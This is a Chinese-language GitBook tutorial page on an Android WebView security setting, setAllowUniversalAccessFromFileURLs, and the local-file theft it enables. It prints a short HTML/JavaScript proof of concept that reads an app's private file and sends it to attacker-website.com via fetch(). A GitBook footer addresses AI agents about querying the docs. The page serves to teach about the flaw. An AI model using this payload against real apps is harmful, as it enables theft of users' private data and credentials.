> For the complete documentation index, see [llms.txt](https://gitbook.cdxiaodong.life/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gitbook.cdxiaodong.life/android-ying-yong-an-quan/webview-vulnerabilities/web-settings.md).

# WebSettings漏洞

## WebSettings 概述

[WebSettings](https://developer.android.com/reference/android/webkit/WebSettings) 管理 WebView 的设置状态。当首次创建 WebView 时，它会获得一组默认设置。从 [WebView#getSettings()](https://developer.android.com/reference/android/webkit/WebView#getSettings%28%29) 获得的 WebSettings 对象与 WebView 的生命周期相关联。

## 安全问题

### setAllowUniversalAccessFromFileURLs

[setAllowUniversalAccessFromFileURLs](https://developer.android.com/reference/android/webkit/WebSettings#setAllowUniversalAccessFromFileURLs%28boolean%29) 设置是否应允许在文件方案 URL 上下文中的跨域请求访问来自**任何来源**的内容。这包括访问来自其他文件方案 URL 或 Web 上下文的内容。自 Android 4.1 以来，默认值为 `false`。

{% hint style="info" %}
此方法在 API 级别 30 中已弃用
{% endhint %}

启用此设置允许在 `file://` 上下文中加载的恶意脚本启动跨站点脚本攻击，访问任意本地文件，包括 WebView cookie、应用私有数据，甚至在任意网站上使用的凭据。

例如，如果应用允许您在 WebView 中打开任意链接，您可以传递到共享 HTML 文件的路径，该文件具有以下内容以窃取私有文件：

```html
<!-- file:///sdcard/index.html -->
<script>
    var url = 'file:///data/data/com.victim.app/internal_folder/private_file.txt';
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (xhr.readyState === 4) {
            fetch('https://attacker-website.com/?content=' + btoa(xhr.responseText));
        }
    }
    xhr.open('GET', url, true);
    xhr.send('');
</script>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://gitbook.cdxiaodong.life/android-ying-yong-an-quan/webview-vulnerabilities/web-settings.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.